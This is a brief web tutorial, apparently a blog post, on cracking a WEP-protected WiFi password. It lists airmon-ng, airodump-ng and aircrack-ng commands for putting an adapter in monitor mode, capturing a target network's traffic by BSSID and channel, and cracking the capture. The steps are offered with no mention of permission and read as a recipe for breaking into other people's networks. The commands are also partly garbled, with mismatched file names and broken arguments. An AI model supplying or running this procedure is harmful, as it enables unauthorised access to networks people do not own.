How To Get WiFi Password (WEP Encryption)

Open your Linux Terminal On Your PC

Step 1 – Type airmon-ng and then enter.

This is to view the list of available wireless adapter on your Laptop/computer.

Step 2 – Type airmon-ng start wlan0 then enter.

This is to activate monitoring mode on interface wlan0.

Step 3 – Type airmon-ng once again Then enter.

This is to look back at monitoring whether the interface is active or not. If it is active will appear one more interface with mon0 name.

Step 4 – Type airodump-ng mon0 then enter.

This command to scan the wireless network via an interface mon0

Step 5 – Note, If you already have wireless prospective targets using WEP security, you can stop the scanning process by Pressing CTRL + C on your keyboard

Step 6 – Record the BSSID and the Wireless Channel and then returned to Scanning using airodump-ng. however scanned more specific to the Candidate on these targets. by typing the command airodump-ng –bssid [BSSID Target] -c [Chanel Target] w / Desktop / results mon0

Step 7 – Wait until the data reaches a number above 5000an

get wifi password

Step 8 – If it is to 5000an, then open a new Terminal and type the following command. Aircrack-ng /Desktop/hasil-01.cap then enter.

You have to wait until the process is complete cracking. By this, you can get WiFi password. This is work with WEP Encryption. Get WiFi password On Android Phone
For Any Video Tutorial Help Contact Us

Share this

Leave a Comment

For security, use of Google's reCAPTCHA service is required which is subject to the Google Privacy Policy and Terms of Use.

I agree to these terms.